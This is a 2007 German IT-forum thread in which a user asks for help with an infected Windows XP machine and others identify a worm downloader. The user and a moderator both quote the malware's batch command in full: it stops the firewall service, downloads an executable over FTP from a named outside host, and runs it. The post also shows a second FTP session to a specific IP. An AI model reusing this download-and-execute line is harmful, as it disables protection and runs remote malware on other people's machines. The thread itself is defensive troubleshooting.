Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Automatischer start einer FTP Verbindung um ba.exe herunter zu laden

Frage Sicherheit Viren und Trojaner

Mitglied: IngoInternet

IngoInternet (Level 1) - Jetzt verbinden

27.03.2007, aktualisiert 01.09.2007, 5804 Aufrufe, 12 Kommentare

Virus Trojaner????

Hallo zusammen,

seit kurzem habe ich auf einem Rechner seltsame Probleme. Der Rechner ist mit Windows XP SP2 ausgestattet und die aktuellsten SP's und Patches sind drauf. Auf dem Rechner läuft Antivr als Virenscanner.

Nun startet sich immer wieder im Hintergrund eine Datei und ruft mir folgenden Befehl auf:

"c:\windows\system32\cmd32.exe -ftp -n -v -s:iJ"

Command-Fenster ist offen und der angezeigte Text lautet:

C:\Windows\system32>cmd /c net stop SharedAccess &echo open elterryer.serveftp.com 21 >> iJ &echo user roko syfredi >> iJ & echo binary >> ij &echo get svchosts.exe >> ij &echo by >> ij &ftp -n -v -s:ij &del ij &svchosts.exe &net start SharedAccess &exit

Danach kommt die Meldung dass die Gemeinsame Nutzung der Internetverbindung erfolgreich beendet wurde. allerdings ist dann ftp geöffnet mit folgenden Werten:

ftp> open 83.239.179.74 64928
ftp> user t g
ftp get ba.exe

Ich kann ja noch ungefähr nachvollziehen was er da alles macht, aber kann die verdammte Datei die den schrott ausführt nicht lokalisieren.

Falls Ihr eine Idee habt, wäre ich euch sehr dankbar.

Grüße

Martin

P.S. Stinger, Adaware, Antivir mehrfach darüberlaufen gelassen, da dies aber normale Befehle sind haben die tools nichts gefunden.
Registry und system.ini sowie win.ini überprüft.
Mitglied: cykes
27.03.2007 um 09:02 Uhr
Hi,

ich würde mal auf einen Wurm/Trojaner tippen. Den Rechner solltest Du mal offline scannen, am besten mit einer auf einem sauberen PC erstellte BartPE BNoot CD und ein paar Antivirentools drauf.

Gruß

cykes
Bitte warten ..
Mitglied: Locke72
27.03.2007 um 09:32 Uhr
Wenn ich das noch richtig in Erinnerung habe, ist die ba.exe ein Tool, welches nach BIOS-Updates bei Mr. BIOS schaut. Siehe auch http://www.nickles.de/biosguide/html/11.php3 Hast du mal versucht, dein BIOS upzudaten ohne die Originalherstellerseite zu nutzen?

Die aufgerufene IP-Adresse jedenfalls gehört nach meinen Recherchen zu Mr. Bios ...
Bitte warten ..
Mitglied: cykes
27.03.2007 um 10:23 Uhr
Aber dieser Teil ist definitiv nicht normal:

"c:\windows\system32\cmd32.exe -ftp -n
-v -s:iJ"

Command-Fenster ist offen und der angezeigte
Text lautet:

C:\Windows\system32>cmd /c net stop
SharedAccess &echo open
elterryer.serveftp.com 21 >> iJ
&echo user roko syfredi >> iJ &
echo binary >> ij &echo get
svchosts.exe >> ij &echo by
>> ij &ftp -n -v -s:ij &del ij
&svchosts.exe &net start SharedAccess
&exit
Bitte warten ..
Mitglied: IngoInternet
27.03.2007 um 14:46 Uhr
habe ich mir auch schon überlegt, werde die Festplatte ausbauen.
Komisch ist nur, dass es standard Befehle sind und ich mir überlegt habe, ob ein Virenscanner diese überhaubt als Virus erkennt.

Gruß

Martin
Bitte warten ..
Mitglied: IngoInternet
27.03.2007 um 14:50 Uhr
Hab ich auch gelesen, vor diesem ba.exe stand aber immer noch etwas davor (cdac11ba.exe)
Und ich wüßte nicht, wann ich irgendwie ein tool zum Bios update installiert hätte.

Gruß

Martin
Bitte warten ..
Mitglied: IngoInternet
27.03.2007 um 14:54 Uhr
Ja, verdammt komisch. Aber Dein Tipp mit dem extern scannen werde ich machen, da er wohl zuerst die svchosts datei von einem FTP server herunter lädt und die könnte natürlich infiziert sein.

Gruß

Martin
Bitte warten ..
Mitglied: cykes
27.03.2007 um 15:34 Uhr
Hi,

habe gerade mal ausprobiert, was es mit dem FTP Server auf sich hat, der ist nicht mehr
existent. Der Hostname gehört zu einem Rechner, der per no-ip.com einen dynamischen DNS
Eintrag bekommt. Das Script dürfte also keine Dateien heruntergeladen haben.
Der Rechner ist über den Provider rima-tde.net - über den ich bisher noch nichts weiteres finden
konnte eingewählt.
Aber sicherheitshalber mach den Offlinescan trotzdem.

Gruß

cykes
Bitte warten ..
Mitglied: IngoInternet
27.03.2007 um 17:33 Uhr
Habe den Offlinescan gemacht aber wie ich vermutet habe ist der scan ohne Meldung durchgelaufen.
Bitte warten ..
Mitglied: IngoInternet
27.03.2007 um 18:00 Uhr
Übrigens habe auch gerade nochmals getestet und der FTP server unter 83.239.179.74 mit der Portnummer 64928 läuft immernoch.
konnte mich sogar anmelden. geht nur nicht ganz durch.
Bitte warten ..
Mitglied: cykes
27.03.2007 um 18:34 Uhr
Mit welchem Scanner hast Du denn Rechner denn überprüft?
Bitte warten ..
Mitglied: IngoInternet
28.03.2007 um 08:52 Uhr
Hallo,

habe die Festplatte ausgebaut und Sophos sowie Antivir nochmals darüber gejagt, keiner hat was gefunden.
Bitte warten ..
Mitglied: gnarff
01.09.2007 um 22:51 Uhr
Nun startet sich immer wieder im Hintergrund
eine Datei und ruft mir folgenden Befehl
auf:

"c:\windows\system32\cmd32.exe -ftp -n
-v -s:iJ"

Command-Fenster ist offen und der angezeigte
Text lautet:

C:\Windows\system32>cmd /c net stop
SharedAccess &echo open
elterryer.serveftp.com 21 >> iJ
&echo user roko syfredi >> iJ &
echo binary >> ij &echo get
svchosts.exe >> ij &echo by
>> ij &ftp -n -v -s:ij &del ij
&svchosts.exe &net start SharedAccess
&exit

Danach kommt die Meldung dass die Gemeinsame
Nutzung der Internetverbindung erfolgreich
beendet wurde. allerdings ist dann ftp
geöffnet mit folgenden Werten:

ftp> open 83.239.179.74 64928
ftp> user t g
ftp get ba.exe

Was wir hier sehen ist der Downloadrequest fuer einen Trojaner, ein schoenes Beispiel hierzu, kann man auf folgender Seite bewundern.
In vorliegenden Fall wurde fruchtlos versucht, die Datei ba.exe herunterzuladen.
Bei der ba. exe handelt es sich um einen Wurm aus der W32/Mytob-Reihe.
Seltsamerweise ist in der Shellaktivitaet ein Verweis auf den Server elterryer.serveftp.com, was eigentlich auf einen anderen Wurm hinweist, den W32.Kenety, siehe weitere Informationen

Das wollte ich nur noch dazu loswerden, bevor ich den Thread auf geloest setze.
saludos
gnarff /el moderador
Bitte warten ..
Ähnliche Inhalte
Batch & Shell
Automatischer Start einer VPN Verbindung
gelöst Frage von BKriegBatch & Shell8 Kommentare

Hallo zusammen, ich benötige Hilfe Ich habe einen gateprotect VPN Client, dieser soll immer Starten wenn ich nicht im ...

Windows Tools
WSUS 3.0 SP2 läd keine Updates herunter
gelöst Frage von gearWindows Tools21 Kommentare

Hallo liebe Gemeinde, seit geraumer Zeit bekommen unsere Clients keine Updates mehr vom internen WSUS-Server. Nach 2 Tagen Recherche ...

Utilities
Dateien mit wechselnden Dateinamen herunter laden per skript
gelöst Frage von Xaero1982Utilities7 Kommentare

Moin Zusammen, ich benötige des öfteren Updates von Dateien aus dem www. Diese sind in unterschiedlichen Ordnern gesichert z.b. ...

Vmware
USV Start, alle VMs fahren herunter.
gelöst Frage von PiinkYVmware11 Kommentare

Guten Morgen, da dies meine erster Beitrag ist, stelle ich mich eben mal vor: Ich bin 24 und Systemadministrator ...

Neue Wissensbeiträge
Windows 10

Autsch: Microsoft bündelt Windows 10 mit unsicherer Passwort-Manager-App

Tipp von kgborn vor 8 StundenWindows 101 Kommentar

Unter Microsofts Windows 10 haben Endbenutzer keine Kontrolle mehr, was Microsoft an Apps auf dem Betriebssystem installiert (die Windows ...

Sicherheits-Tools

Achtung: Sicherheitslücke im FortiClient VPN-Client

Tipp von kgborn vor 9 StundenSicherheits-Tools

Ich weiß nicht, wie häufig die NextGeneration Endpoint Protection-Lösung von Fortinet in deutschen Unternehmen eingesetzt wird. An dieser Stelle ...

Internet

USA: Die FCC schaff die Netzneutralität ab

Information von Frank vor 1 TagInternet3 Kommentare

Jetzt beschädigt US-Präsident Donald Trump auch noch das Internet. Der neu eingesetzte FCC-Chef Ajit Pai ist bekannter Gegner einer ...

DSL, VDSL

ALL-BM200VDSL2V - Neues VDSL-Modem mit Vectoring von Allnet

Information von Lochkartenstanzer vor 1 TagDSL, VDSL2 Kommentare

Moin, Falls jemand eine Alternative zu dem draytek sucht: Gruß lks

Heiß diskutierte Inhalte
TK-Netze & Geräte
VPN-fähige IP-Telefone
Frage von the-buccaneerTK-Netze & Geräte16 Kommentare

Hi! Weiss noch jemand ein VPN-fähiges IP-Telefon mit dem man z.B. einen Heimarbeitsplatz gesichert anbinden könnte? Habe nur einen ...

Hardware
Links klick bei Maus funktioniert nicht
gelöst Frage von Pablu23Hardware16 Kommentare

Hallo erstmal. Ich habe ein Problem mit meiner relativ alten maus jedoch denke ich nicht das es an der ...

Windows Server
Anmeldung direkt am DC nicht möglich
Frage von ThomasGrWindows Server16 Kommentare

Hallo, ich habe bei unserem Server 2016 Standard ein Problem. Keine Ahnung wie das auf einmal passiert ist. Ich ...

Windows Server
KMS Facts for Client configuration
Frage von winlinWindows Server12 Kommentare

Hey Leute, wir haben in unserem Netz nun einen neuen KMS Server. Haben Bestands-VMs die noch nicht aktiviert sind. ...